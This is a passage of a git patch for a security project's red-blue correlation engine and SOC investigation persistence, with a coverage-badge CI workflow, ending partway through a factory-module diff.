to repo (`.github/badges/coverage.svg`) - Added comprehensive test suites for correlation, learning, persistence, and query resilience modules (`tests/test_correlation.py`, `tests/test_learning.py`, `tests/test_persistence.py`, `tests/test_query_resilience.py`) **Changed:** - Extended `InvestigationOrchestrator` to persist all completed, escalated, timed out, and failed investigations for later learning and analysis - Updated query tool wrapping in `blue_factory.py` to integrate rate limiting, duplicate detection, and resilient execution via the new resilience module - Added `LearningTools` to agent toolset for blue investigations - Updated `.pre-commit-config.yaml` to exclude `tests/` from mypy type checks - Modified test workflow to output coverage as XML and upload coverage artifact for badge generation (`.github/workflows/tests.yaml`) - Updated `src/ares/tools/blue/__init__.py` to export new learning tools - Various code comments and docstrings cleaned up for clarity and conciseness **Removed:** - None --- .github/badges/coverage.svg | 16 + .github/workflows/coverage-badge.yaml | 49 ++ .github/workflows/tests.yaml | 10 +- .pre-commit-config.yaml | 1 + src/ares/agents/blue/soc_investigator.py | 102 ++- src/ares/core/correlation.py | 844 +++++++++++++++++++++++ src/ares/core/factories/blue_factory.py | 131 +++- src/ares/core/persistence.py | 843 ++++++++++++++++++++++ src/ares/core/query_resilience.py | 402 +++++++++++ src/ares/core/remote.py | 1 - src/ares/integrations/mitre.py | 3 - src/ares/main.py | 9 - src/ares/reports/redteam.py | 4 +- src/ares/tools/blue/__init__.py | 2 + src/ares/tools/blue/actions.py | 7 - src/ares/tools/blue/learning.py | 347 ++++++++++ src/ares/tools/blue/observability.py | 3 - tests/test_correlation.py | 735 ++++++++++++++++++++ tests/test_learning.py | 529 ++++++++++++++ tests/test_persistence.py | 537 ++++++++++++++ tests/test_query_resilience.py | 516 ++++++++++++++ 21 files changed, 5030 insertions(+), 61 deletions(-) create mode 
100644 .github/badges/coverage.svg create mode 100644 .github/workflows/coverage-badge.yaml create mode 100644 src/ares/core/correlation.py create mode 100644 src/ares/core/persistence.py create mode 100644 src/ares/core/query_resilience.py create mode 100644 src/ares/tools/blue/learning.py create mode 100644 tests/test_correlation.py create mode 100644 tests/test_learning.py create mode 100644 tests/test_persistence.py create mode 100644 tests/test_query_resilience.py diff --git a/.github/badges/coverage.svg b/.github/badges/coverage.svg new file mode 100644 index 00000000..f9095ee3 --- /dev/null +++ b/.github/badges/coverage.svg @@ -0,0 +1,16 @@ + + + + + + + + + + + coverage + coverage + N/A + N/A + + diff --git a/.github/workflows/coverage-badge.yaml b/.github/workflows/coverage-badge.yaml new file mode 100644 index 00000000..0f1d7211 --- /dev/null +++ b/.github/workflows/coverage-badge.yaml @@ -0,0 +1,49 @@ +--- +name: 📊 Coverage Badge + +on: + workflow_run: + workflows: ["🐍 Python Tests"] + types: + - completed + branches: + - main + +permissions: + contents: write + +jobs: + badge: + name: 📊 Generate coverage badge + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == 'success' + + steps: + - name: Set up git repository + uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1 + + - name: Download coverage artifact + uses: actions/download-artifact@fa0a91b85d4f404e444e00e005971372dc801d16 # v4.1.8 + with: + name: coverage-report + run-id: ${{ github.event.workflow_run.id }} + github-token: ${{ secrets.GITHUB_TOKEN }} + + - name: Set up Python + uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0 + with: + python-version: "3.12" + + - name: Generate coverage badge + run: | + pip install "genbadge[coverage]" + mkdir -p .github/badges + genbadge coverage -i coverage.xml -o .github/badges/coverage.svg + + - name: Commit badge + run: | + git config --local user.email 
"github-actions[bot]@users.noreply.github.com" + git config --local user.name "github-actions[bot]" + git add .github/badges/coverage.svg + git diff --staged --quiet || git commit -m "Update coverage badge [skip ci]" + git push diff --git a/.github/workflows/tests.yaml b/.github/workflows/tests.yaml index 0ff24b80..9f83af99 100644 --- a/.github/workflows/tests.yaml +++ b/.github/workflows/tests.yaml @@ -55,4 +55,12 @@ jobs: - name: Run tests with coverage run: | - pytest --cov=src --cov-report=term-missing || [ $? -eq 5 ] # Allow workflow to pass when no tests exist + pytest --cov=src --cov-report=xml --cov-report=term-missing || [ $? -eq 5 ] # Allow workflow to pass when no tests exist + + - name: Upload coverage report + if: github.ref == 'refs/heads/main' && github.event_name == 'push' && matrix.python-version == '3.12' + uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2 + with: + name: coverage-report + path: coverage.xml + retention-days: 1 diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 57a1db34..4eba889c 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -93,6 +93,7 @@ repos: rev: v1.19.1 hooks: - id: mypy + exclude: ^tests/ additional_dependencies: - "types-PyYAML" - "types-requests" diff --git a/src/ares/agents/blue/soc_investigator.py b/src/ares/agents/blue/soc_investigator.py index c528cc52..769f9584 100644 --- a/src/ares/agents/blue/soc_investigator.py +++ b/src/ares/agents/blue/soc_investigator.py @@ -15,6 +15,10 @@ from ares.core.factories.blue_factory import create_investigation_agent, reset_query_tracking from ares.core.models import InvestigationState, TimelineEvent +from ares.core.persistence import ( + create_stored_investigation_from_state, + get_investigation_store, +) from ares.core.templates import get_template_loader from ares.integrations.mitre import MITREAttackClient @@ -106,7 +110,6 @@ def build_initial_prompt(alert: dict) -> str: if key in labels: mitre_technique = 
labels[key] break - # Also check annotations if not mitre_technique: for key in ["mitre_technique", "mitre", "technique_id", "technique"]: if key in annotations: @@ -297,7 +300,6 @@ async def investigate(self, alert: dict) -> dict: logger.info(f"Auto-recorded MITRE technique from alert: {tech_id}") break - # Create initial timeline event from alert self._create_alert_timeline_event(state, alert) initial_prompt = build_initial_prompt(alert) @@ -340,7 +342,6 @@ async def investigate(self, alert: dict) -> dict: logger.success(f"Agent completed: {result.steps} steps, {result.stop_reason}") - # Check if agent hit max_steps without proper completion status = "completed" if state.escalated: status = "escalated" @@ -353,6 +354,9 @@ async def investigate(self, alert: dict) -> dict: # Generate report report_path = self._generate_report(state, result) + # Persist investigation for learning + self._persist_investigation(state, status) + dn.log_output("report_path", str(report_path)) dn.log_metric("investigation_success", 1) @@ -375,6 +379,10 @@ async def investigate(self, alert: dict) -> dict: # Still generate a partial report on timeout report_path = self._generate_report(state, None) + + # Persist investigation for learning (even on timeout) + self._persist_investigation(state, "timeout") + return { "investigation_id": investigation_id, "status": "timeout", @@ -387,6 +395,9 @@ async def investigate(self, alert: dict) -> dict: except Exception as e: logger.error(f"Investigation failed: {e}") dn.log_metric("investigation_failed", 1) + + # Persist failed investigation + self._persist_investigation(state, "failed") raise finally: @@ -398,7 +409,6 @@ def _create_alert_timeline_event(self, state: InvestigationState, alert: dict) - labels = alert.get("labels", {}) annotations = alert.get("annotations", {}) - # Parse alert timestamp starts_at = alert.get("startsAt", "") try: if starts_at: @@ -408,7 +418,6 @@ def _create_alert_timeline_event(self, state: InvestigationState, alert: 
dict) - except ValueError: alert_time = datetime.now(timezone.utc) - # Build description from alert alert_name = labels.get("alertname", "Unknown Alert") severity = labels.get("severity", "unknown") summary = annotations.get("summary", annotations.get("description", "")) @@ -417,7 +426,6 @@ def _create_alert_timeline_event(self, state: InvestigationState, alert: dict) - if summary: description += f" - {summary[:100]}" - # Get MITRE technique from alert mitre_techniques = [] for key in ["mitre_technique", "mitre", "technique_id"]: if labels.get(key): @@ -427,7 +435,6 @@ def _create_alert_timeline_event(self, state: InvestigationState, alert: dict) - mitre_techniques.append(annotations[key]) break - # Create timeline event event = TimelineEvent( id="tl-alert-0000", timestamp=alert_time, @@ -447,3 +454,84 @@ def _generate_report(self, state: InvestigationState, _result) -> Path: generator = MarkdownReportGenerator(self.report_dir) return generator.generate(state) + + def _persist_investigation(self, state: InvestigationState, status: str) -> None: + """Persist investigation results for learning. 
+ + Args: + state: Investigation state to persist + status: Final status (completed, escalated, timeout, failed) + """ + try: + store = get_investigation_store() + + # Create stored investigation from state + stored = create_stored_investigation_from_state(state, status) + + # Store the investigation + store.store_investigation(stored) + + # Update query effectiveness statistics + alert_name = state.alert.get("labels", {}).get("alertname", "unknown") + for query in state.executed_queries: + query_str = query.get("query", "") + if query_str: + # Normalize query for pattern matching + pattern = self._normalize_query_pattern(query_str) + successful = query.get("result_count", 0) > 0 + # Check if any evidence was recorded after this query + produced_evidence = len(state.evidence) > 0 + + store.update_query_effectiveness( + query_pattern=pattern, + successful=successful, + produced_evidence=produced_evidence, + alert_type=alert_name, + ) + + logger.info(f"Persisted investigation {state.investigation_id} to store") + + except Exception as e: + # Don't fail the investigation if persistence fails + logger.warning(f"Failed to persist investigation: {e}") + + def _normalize_query_pattern(self, query: str) -> str: + """Normalize a query string into a reusable pattern. + + Replaces specific values with placeholders for pattern matching. 
+ + Args: + query: Raw query string + + Returns: + Normalized pattern string + """ + import re + + pattern = query + + # Replace timestamps with placeholder + pattern = re.sub( + r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|[+-]\d{2}:\d{2})?", + "", + pattern, + ) + + # Replace IP addresses with placeholder + pattern = re.sub(r"\d+\.\d+\.\d+\.\d+", "", pattern) + + # Replace UUIDs with placeholder + pattern = re.sub( + r"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}", + "", + pattern, + flags=re.IGNORECASE, + ) + + # Replace specific hostnames (anything.domain.tld format) + return re.sub( + r"\b[a-z0-9-]+\.[a-z0-9-]+\.[a-z]{2,}\b", + "", + pattern, + flags=re.IGNORECASE, + ) diff --git a/src/ares/core/correlation.py b/src/ares/core/correlation.py new file mode 100644 index 00000000..6c2e0358 --- /dev/null +++ b/src/ares/core/correlation.py @@ -0,0 +1,844 @@ +""" +Red-Blue Correlation Engine. + +Correlates red team attack activities with blue team detections +to measure detection coverage and identify gaps. 
+""" + +import re +from dataclasses import dataclass, field +from datetime import datetime, timedelta, timezone +from pathlib import Path +from typing import Any, ClassVar + +from loguru import logger + + +@dataclass +class RedTeamActivity: + """A single red team activity/action.""" + + timestamp: datetime + technique_id: str | None + technique_name: str | None + action: str + target_ip: str | None + target_host: str | None + credential_used: str | None + success: bool + metadata: dict[str, Any] = field(default_factory=dict) + + @property + def key(self) -> str: + """Generate a unique key for this activity.""" + return f"{self.timestamp.isoformat()}:{self.technique_id}:{self.target_ip}" + + +@dataclass +class BlueTeamDetection: + """A blue team detection/alert.""" + + timestamp: datetime + alert_name: str + technique_id: str | None + severity: str + target_ip: str | None + target_host: str | None + investigation_id: str | None + status: str # completed, escalated, timeout + evidence_count: int + highest_pyramid_level: int + metadata: dict[str, Any] = field(default_factory=dict) + + @property + def key(self) -> str: + """Generate a unique key for this detection.""" + return f"{self.timestamp.isoformat()}:{self.technique_id}:{self.alert_name}" + + +@dataclass +class CorrelationMatch: + """A match between red team activity and blue team detection.""" + + red_activity: RedTeamActivity + blue_detection: BlueTeamDetection + time_delta_seconds: float + technique_match: bool + target_match: bool + confidence: float + + @property + def match_quality(self) -> str: + """Assess the quality of this match.""" + if self.technique_match and self.target_match and abs(self.time_delta_seconds) < 300: + return "STRONG" + if self.technique_match and abs(self.time_delta_seconds) < 600: + return "GOOD" + if self.technique_match or (self.target_match and abs(self.time_delta_seconds) < 300): + return "WEAK" + return "TENUOUS" + + +@dataclass +class DetectionGap: + """An undetected red team 
activity.""" + + red_activity: RedTeamActivity + reason: str + recommended_detection: str | None = None + mitre_data_sources: list[str] = field(default_factory=list) + + +@dataclass +class CorrelationReport: + """Full correlation analysis report.""" + + analysis_timestamp: datetime + red_operation_id: str + time_window_start: datetime + time_window_end: datetime + + # Counts + total_red_activities: int + total_blue_detections: int + matched_activities: int + undetected_activities: int + false_positive_detections: int + + # Details + matches: list[CorrelationMatch] + gaps: list[DetectionGap] + false_positives: list[BlueTeamDetection] + + # Metrics + detection_rate: float + false_positive_rate: float + mean_time_to_detect: float | None # seconds + + # By technique + technique_coverage: dict[str, dict[str, Any]] + + def to_dict(self) -> dict[str, Any]: + """Convert report to dictionary.""" + return { + "analysis_timestamp": self.analysis_timestamp.isoformat(), + "red_operation_id": self.red_operation_id, + "time_window": { + "start": self.time_window_start.isoformat(), + "end": self.time_window_end.isoformat(), + }, + "summary": { + "total_red_activities": self.total_red_activities, + "total_blue_detections": self.total_blue_detections, + "matched_activities": self.matched_activities, + "undetected_activities": self.undetected_activities, + "false_positive_detections": self.false_positive_detections, + "detection_rate": f"{self.detection_rate * 100:.1f}%", + "false_positive_rate": f"{self.false_positive_rate * 100:.1f}%", + "mean_time_to_detect": f"{self.mean_time_to_detect:.1f}s" + if self.mean_time_to_detect + else "N/A", + }, + "technique_coverage": self.technique_coverage, + "matches": [ + { + "red_technique": m.red_activity.technique_id, + "red_action": m.red_activity.action[:100], + "blue_alert": m.blue_detection.alert_name, + "time_delta_seconds": m.time_delta_seconds, + "match_quality": m.match_quality, + "confidence": m.confidence, + } + for m in self.matches 
+ ], + "gaps": [ + { + "technique": g.red_activity.technique_id, + "action": g.red_activity.action[:100], + "timestamp": g.red_activity.timestamp.isoformat(), + "reason": g.reason, + "recommended_detection": g.recommended_detection, + } + for g in self.gaps + ], + "false_positives": [ + { + "alert_name": fp.alert_name, + "technique": fp.technique_id, + "timestamp": fp.timestamp.isoformat(), + } + for fp in self.false_positives + ], + } + + +class RedBlueCorrelator: + """Correlates red team activities with blue team detections. + + This engine: + 1. Parses red team operation reports + 2. Parses blue team investigation reports + 3. Matches activities based on time, technique, and target + 4. Identifies detection gaps + 5. Calculates coverage metrics + """ + + # Time window for matching (activities within this window are considered related) + DEFAULT_TIME_WINDOW_MINUTES = 30 + + TECHNIQUE_PATTERNS: ClassVar[list[str]] = [ + r"T\d{4}(?:\.\d{3})?", # T1234 or T1234.001 + ] + + def __init__( + self, + reports_dir: Path, + time_window_minutes: int = DEFAULT_TIME_WINDOW_MINUTES, + ): + """Initialize the correlator. + + Args: + reports_dir: Directory containing red team and investigation reports + time_window_minutes: Time window for matching activities + """ + self.reports_dir = Path(reports_dir) + self.time_window = timedelta(minutes=time_window_minutes) + + def load_red_team_report(self, report_path: Path) -> tuple[str, list[RedTeamActivity]]: + """Load and parse a red team report. 
+ + Args: + report_path: Path to the red team report markdown file + + Returns: + Tuple of (operation_id, list of activities) + """ + content = report_path.read_text() + activities = [] + + # Extract operation ID + operation_id_match = re.search(r"\*\*Operation ID\*\*:\s*(\S+)", content) + operation_id = operation_id_match.group(1) if operation_id_match else "unknown" + + # Extract target IP + target_ip_match = re.search(r"\*\*Target\*\*:\s*(\d+\.\d+\.\d+\.\d+)", content) + target_ip = target_ip_match.group(1) if target_ip_match else None + + # Extract start time + started_match = re.search(r"\*\*Started\*\*:\s*(.+?)(?:\n|$)", content) + if started_match: + try: + started_at = datetime.strptime( + started_match.group(1).strip(), "%Y-%m-%d %H:%M:%S UTC" + ).replace(tzinfo=timezone.utc) + except ValueError: + started_at = datetime.now(timezone.utc) + else: + started_at = datetime.now(timezone.utc) + + # Extract hosts discovered + hosts_section = re.search(r"### Hosts \((\d+)\)(.*?)(?=###|\Z)", content, re.DOTALL) + if hosts_section: + host_count = int(hosts_section.group(1)) + if host_count > 0: + activities.append( + RedTeamActivity( + timestamp=started_at, + technique_id="T1046", # Network Service Discovery + technique_name="Network Service Discovery", + action=f"Discovered {host_count} host(s) via network scanning", + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + ) + ) + + # Extract credentials obtained + creds_section = re.search(r"### Credentials \((\d+)\)(.*?)(?=###|\Z)", content, re.DOTALL) + if creds_section: + creds_content = creds_section.group(2) + + cred_matches = re.findall( + r"\*\*(\S+)\*\*\s*\n.*?Source:\s*(.+?)(?:\n|$)", creds_content + ) + for username, source in cred_matches: + activities.append( + RedTeamActivity( + timestamp=started_at + timedelta(minutes=1), # Slightly after start + technique_id="T1110" if "guessing" in source.lower() else "T1003", + technique_name="Credential Guessing" + if "guessing" in 
source.lower() + else "Credential Dumping", + action=f"Obtained credential for {username} via {source}", + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + metadata={"username": username, "source": source}, + ) + ) + + # Extract MITRE techniques from timeline + timeline_section = re.search( + r"### Timeline of Key Events(.*?)(?=---|\Z)", content, re.DOTALL + ) + if timeline_section: + timeline_content = timeline_section.group(1) + event_matches = re.findall( + r"\|\s*([^|]+)\s*\|\s*([^|]+)\s*\|\s*(T\d{4}(?:\.\d{3})?)\s*\|", timeline_content + ) + for timestamp_str, description, technique_id in event_matches: + try: + event_time = datetime.fromisoformat( + timestamp_str.strip().replace("Z", "+00:00") + ) + except ValueError: + event_time = started_at + activities.append( + RedTeamActivity( + timestamp=event_time, + technique_id=technique_id.strip(), + technique_name=None, + action=description.strip(), + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + ) + ) + + # Check for domain admin / golden ticket + if "Domain Admin Access**: ✓" in content or "has_domain_admin: true" in content.lower(): + activities.append( + RedTeamActivity( + timestamp=started_at + timedelta(minutes=5), + technique_id="T1078.002", + technique_name="Valid Accounts: Domain Accounts", + action="Achieved Domain Admin access", + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + ) + ) + + if "Golden Ticket**: ✓" in content or "has_golden_ticket: true" in content.lower(): + activities.append( + RedTeamActivity( + timestamp=started_at + timedelta(minutes=6), + technique_id="T1558.001", + technique_name="Golden Ticket", + action="Generated Golden Ticket for persistence", + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + ) + ) + + logger.info(f"Loaded {len(activities)} activities from red team report {operation_id}") + return operation_id, activities + + def 
load_investigation_report(self, report_path: Path) -> BlueTeamDetection | None: + """Load and parse a blue team investigation report. + + Args: + report_path: Path to the investigation report markdown file + + Returns: + BlueTeamDetection object or None if parsing fails + """ + content = report_path.read_text() + + # Skip DatasourceNoData reports + if "DatasourceNoData" in report_path.name: + return None + + # Extract investigation ID + inv_id_match = re.search(r"\*\*Investigation ID:\*\*\s*`?(\S+?)`?(?:\n|$)", content) + investigation_id = inv_id_match.group(1) if inv_id_match else None + + # Extract alert name + alert_match = re.search(r"\|\s*Alert Name\s*\|\s*(.+?)\s*\|", content) + alert_name = alert_match.group(1).strip() if alert_match else "Unknown" + + # Extract severity + severity_match = re.search(r"\|\s*Severity\s*\|\s*(\w+)\s*\|", content) + severity = severity_match.group(1).strip() if severity_match else "unknown" + + # Extract timestamp from alert payload + starts_at_match = re.search(r'"startsAt":\s*"([^"]+)"', content) + if starts_at_match: + try: + timestamp = datetime.fromisoformat(starts_at_match.group(1).replace("Z", "+00:00")) + except ValueError: + timestamp = datetime.now(timezone.utc) + else: + # Try to extract from filename + date_match = re.search(r"(\d{8}_\d{6})", report_path.name) + if date_match: + try: + timestamp = datetime.strptime(date_match.group(1), "%Y%m%d_%H%M%S").replace( + tzinfo=timezone.utc + ) + except ValueError: + timestamp = datetime.now(timezone.utc) + else: + timestamp = datetime.now(timezone.utc) + + # Extract MITRE technique + technique_match = re.search(r"(T\d{4}(?:\.\d{3})?)", content) + technique_id = technique_match.group(1) if technique_match else None + + # Extract status + status_match = re.search(r"\|\s*Status\s*\|\s*(\w+)", content) + status = status_match.group(1).strip().lower() if status_match else "unknown" + + # Extract evidence count + evidence_match = re.search(r"\*\*Evidence Collected:\*\*\s*(\d+)", 
def correlate(  # noqa: PLR0912
    self,
    red_activities: list[RedTeamActivity],
    blue_detections: list[BlueTeamDetection],
    operation_id: str = "unknown",
) -> CorrelationReport:
    """Correlate red team activities with blue team detections.

    Every red activity is paired with the single highest-confidence detection
    whose timestamp lies within ``self.time_window`` of it. Confidence is the
    sum of 0.5 for an identical technique ID, 0.3 for an identical target IP
    and up to 0.2 for time proximity. Pairs scoring below 0.3 are dropped, so
    time proximity alone never produces a match. One detection may be matched
    to several activities.

    Args:
        red_activities: List of red team activities
        blue_detections: List of blue team detections
        operation_id: Red team operation ID

    Returns:
        CorrelationReport with matches, detection gaps, false positives,
        detection/false-positive rates, mean time to detect and
        per-technique coverage.
    """
    matches: list[CorrelationMatch] = []
    matched_red_keys: set[str] = set()
    matched_blue_keys: set[str] = set()

    # Constant for the whole run; hoisted out of the pairwise loop.
    window_seconds = self.time_window.total_seconds()

    red_activities = sorted(red_activities, key=lambda x: x.timestamp)
    blue_detections = sorted(blue_detections, key=lambda x: x.timestamp)

    if red_activities:
        time_window_start = min(a.timestamp for a in red_activities) - self.time_window
        time_window_end = max(a.timestamp for a in red_activities) + self.time_window
    else:
        # No activities: fall back to the last hour, read from a single clock
        # sample so the two bounds are exactly one hour apart.
        now = datetime.now(timezone.utc)
        time_window_start = now - timedelta(hours=1)
        time_window_end = now

    # Match activities to detections
    for red_activity in red_activities:
        best_match: CorrelationMatch | None = None
        best_confidence = 0.0

        for detection in blue_detections:
            time_delta = (detection.timestamp - red_activity.timestamp).total_seconds()

            if abs(time_delta) > window_seconds:
                continue

            technique_match = (
                red_activity.technique_id is not None
                and detection.technique_id is not None
                and red_activity.technique_id == detection.technique_id
            )

            target_match = (
                red_activity.target_ip is not None
                and detection.target_ip is not None
                and red_activity.target_ip == detection.target_ip
            )

            confidence = 0.0
            if technique_match:
                confidence += 0.5
            if target_match:
                confidence += 0.3

            # Time proximity bonus (closer = higher confidence). A zero-length
            # window only admits simultaneous events, which count as full
            # proximity; dividing by the window would raise ZeroDivisionError.
            if window_seconds > 0:
                proximity = max(0, 1 - abs(time_delta) / window_seconds)
            else:
                proximity = 1.0
            confidence += proximity * 0.2

            if confidence > best_confidence:
                best_confidence = confidence
                best_match = CorrelationMatch(
                    red_activity=red_activity,
                    blue_detection=detection,
                    time_delta_seconds=time_delta,
                    technique_match=technique_match,
                    target_match=target_match,
                    confidence=confidence,
                )

        if best_match and best_match.confidence >= 0.3:
            matches.append(best_match)
            matched_red_keys.add(red_activity.key)
            matched_blue_keys.add(best_match.blue_detection.key)

    # Identify detection gaps (undetected red activities)
    gaps: list[DetectionGap] = [
        DetectionGap(
            red_activity=activity,
            reason=self._determine_gap_reason(activity, blue_detections),
            recommended_detection=self._recommend_detection(activity),
        )
        for activity in red_activities
        if activity.key not in matched_red_keys
    ]

    # Detections inside the analysis window; those that matched nothing are
    # reported as false positives.
    detections_in_window = [
        d for d in blue_detections if time_window_start <= d.timestamp <= time_window_end
    ]
    false_positives: list[BlueTeamDetection] = [
        d for d in detections_in_window if d.key not in matched_blue_keys
    ]

    total_red = len(red_activities)
    matched_count = len(matches)
    detection_rate = matched_count / total_red if total_red > 0 else 0.0
    false_positive_rate = (
        len(false_positives) / len(detections_in_window) if detections_in_window else 0.0
    )

    # Only detections at or after the activity contribute to time-to-detect.
    time_deltas = [m.time_delta_seconds for m in matches if m.time_delta_seconds >= 0]
    mean_ttd = sum(time_deltas) / len(time_deltas) if time_deltas else None

    technique_coverage = self._calculate_technique_coverage(red_activities, matches, gaps)

    return CorrelationReport(
        analysis_timestamp=datetime.now(timezone.utc),
        red_operation_id=operation_id,
        time_window_start=time_window_start,
        time_window_end=time_window_end,
        total_red_activities=total_red,
        total_blue_detections=len(blue_detections),
        matched_activities=matched_count,
        undetected_activities=len(gaps),
        false_positive_detections=len(false_positives),
        matches=matches,
        gaps=gaps,
        false_positives=false_positives,
        detection_rate=detection_rate,
        false_positive_rate=false_positive_rate,
        mean_time_to_detect=mean_ttd,
        technique_coverage=technique_coverage,
    )
def generate_report_markdown(self, report: CorrelationReport) -> str:  # noqa: PLR0912
    """Generate a markdown report from correlation results.

    Sections are emitted in this order: executive summary, assessment,
    technique coverage, successful detections (first 20), detection gaps
    (first 20), false positives (first 10) and recommendations. Optional
    sections are skipped when their source list is empty.

    Args:
        report: CorrelationReport object

    Returns:
        Markdown formatted report string
    """

    def cell(text: str, limit: int) -> str:
        """Clip *text* to *limit* characters and make it safe for a table cell."""
        # The ellipsis is added only when something was actually cut off.
        clipped = text if len(text) <= limit else f"{text[:limit]}..."
        # An unescaped pipe would start a new column and break the table row.
        return clipped.replace("|", "\\|")

    # Compare against None rather than truthiness: a mean of 0.0 seconds is a
    # valid measurement and must not be rendered as "N/A".
    if report.mean_time_to_detect is not None:
        mean_ttd = f"{report.mean_time_to_detect:.0f}s"
    else:
        mean_ttd = "N/A"

    lines = [
        "# Red-Blue Correlation Report",
        "",
        f"**Analysis Time:** {report.analysis_timestamp.strftime('%Y-%m-%d %H:%M:%S UTC')}",
        f"**Red Team Operation:** {report.red_operation_id}",
        f"**Time Window:** {report.time_window_start.strftime('%Y-%m-%d %H:%M')} to {report.time_window_end.strftime('%Y-%m-%d %H:%M')}",
        "",
        "---",
        "",
        "## Executive Summary",
        "",
        "| Metric | Value |",
        "|--------|-------|",
        f"| Red Team Activities | {report.total_red_activities} |",
        f"| Blue Team Detections | {report.total_blue_detections} |",
        f"| Matched (Detected) | {report.matched_activities} |",
        f"| Detection Gaps | {report.undetected_activities} |",
        f"| False Positives | {report.false_positive_detections} |",
        f"| **Detection Rate** | **{report.detection_rate * 100:.1f}%** |",
        f"| False Positive Rate | {report.false_positive_rate * 100:.1f}% |",
        f"| Mean Time to Detect | {mean_ttd} |",
        "",
    ]

    # Detection rate assessment
    if report.detection_rate >= 0.8:
        assessment = "EXCELLENT - Blue team is detecting most red team activities"
    elif report.detection_rate >= 0.6:
        assessment = "GOOD - Majority of activities detected, some gaps remain"
    elif report.detection_rate >= 0.4:
        assessment = "MODERATE - Significant detection gaps exist"
    else:
        assessment = "POOR - Most red team activities went undetected"

    lines.extend(
        [
            f"### Assessment: {assessment}",
            "",
            "---",
            "",
        ]
    )

    # Technique coverage
    if report.technique_coverage:
        lines.extend(
            [
                "## Technique Coverage",
                "",
                "| Technique | Total | Detected | Missed | Rate |",
                "|-----------|-------|----------|--------|------|",
            ]
        )
        for tech_id, data in sorted(report.technique_coverage.items()):
            rate = data["detection_rate"]
            if rate >= 0.8:
                rate_emoji = "✅"
            elif rate >= 0.5:
                rate_emoji = "⚠️"
            else:
                rate_emoji = "❌"
            lines.append(
                f"| {tech_id} | {data['total']} | {data['detected']} | {data['missed']} | {rate_emoji} {rate * 100:.0f}% |"
            )
        lines.extend(["", "---", ""])

    # Successful detections
    if report.matches:
        lines.extend(
            [
                "## Successful Detections",
                "",
                "| Red Activity | Blue Alert | Time Delta | Quality |",
                "|--------------|------------|------------|---------|",
            ]
        )
        for match in report.matches[:20]:  # Limit to 20
            lines.append(
                f"| {match.red_activity.technique_id or 'N/A'}: {cell(match.red_activity.action, 40)} | "
                f"{cell(match.blue_detection.alert_name, 30)} | "
                f"{match.time_delta_seconds:.0f}s | "
                f"{match.match_quality} |"
            )
        lines.extend(["", "---", ""])

    # Detection gaps
    if report.gaps:
        lines.extend(
            [
                "## Detection Gaps (Undetected Activities)",
                "",
                "| Technique | Activity | Reason | Recommendation |",
                "|-----------|----------|--------|----------------|",
            ]
        )
        for gap in report.gaps[:20]:  # Limit to 20
            lines.append(
                f"| {gap.red_activity.technique_id or 'N/A'} | "
                f"{cell(gap.red_activity.action, 40)} | "
                f"{cell(gap.reason, 40)} | "
                f"{gap.recommended_detection or 'N/A'} |"
            )
        lines.extend(["", "---", ""])

    # False positives
    if report.false_positives:
        lines.extend(
            [
                "## False Positives (Detections without Red Activity)",
                "",
                "| Alert | Technique | Time |",
                "|-------|-----------|------|",
            ]
        )
        for fp in report.false_positives[:10]:  # Limit to 10
            lines.append(
                f"| {cell(fp.alert_name, 40)} | {fp.technique_id or 'N/A'} | {fp.timestamp.strftime('%H:%M:%S')} |"
            )
        lines.extend(["", "---", ""])

    # Recommendations
    lines.extend(
        [
            "## Recommendations",
            "",
        ]
    )

    # One recommendation per technique: the first gap seen for it wins.
    recommendations: dict[str, str] = {}
    for gap in report.gaps:
        if gap.recommended_detection:
            recommendations.setdefault(
                gap.red_activity.technique_id or "General", gap.recommended_detection
            )
    lines.extend(
        f"{i}. **{tech}**: {rec}" for i, (tech, rec) in enumerate(recommendations.items(), 1)
    )

    if report.detection_rate < 0.8:
        lines.extend(
            [
                "",
                "### General Improvements",
                "- Review query timeout issues in Loki/Grafana",
                "- Ensure log ingestion latency is < 60 seconds",
                "- Add missing detection rules for uncovered techniques",
                "- Consider increasing alert rule evaluation frequency",
            ]
        )

    lines.extend(
        [
            "",
            "---",
            "",
            "*Report generated by Ares Red-Blue Correlation Engine*",
        ]
    )

    return "\n".join(lines)
+ + Returns: + List of CorrelationReport objects, one per red team operation + """ + red_reports, blue_detections = self.load_all_reports() + + reports = [] + for operation_id, activities in red_reports: + report = self.correlate(activities, blue_detections, operation_id) + reports.append(report) + + # Generate and save markdown report + markdown = self.generate_report_markdown(report) + report_path = self.reports_dir / f"correlation_{operation_id}.md" + report_path.write_text(markdown) + logger.success(f"Generated correlation report: {report_path}") + + return reports diff --git a/src/ares/core/factories/blue_factory.py b/src/ares/core/factories/blue_factory.py index cf96a4b8..bb64d903 100644 --- a/src/ares/core/factories/blue_factory.py +++ b/src/ares/core/factories/blue_factory.py @@ -12,19 +12,20 @@ from loguru import logger from ares.core.models import InvestigationState +from ares.core.query_resilience import QueryResilientExecutor, get_resilient_executor from ares.core.templates import get_template_loader from ares.integrations.mitre import MITREAttackClient from ares.tools.blue import ( CompletionTools, GrafanaTools, InvestigationTools, + LearningTools, QueryTemplateTools, QuestionEngineTools, escalate_investigation, ) from ares.tools.shared import MITRELookupTools -# Load system instructions from template SYSTEM_INSTRUCTIONS = get_template_loader().render("agent/system_instructions.md.jinja") # Track query calls - reset per investigation via reset_query_tracking() @@ -41,6 +42,8 @@ def reset_query_tracking(): """Reset query tracking for a new investigation.""" + from ares.core.query_resilience import reset_resilient_executor + global \ _total_queries, \ _consecutive_queries, \ @@ -54,6 +57,7 @@ def reset_query_tracking(): _executed_queries = [] _seen_queries = {} _current_state = None + reset_resilient_executor() def set_investigation_state(state: "InvestigationState"): @@ -147,29 +151,34 @@ def 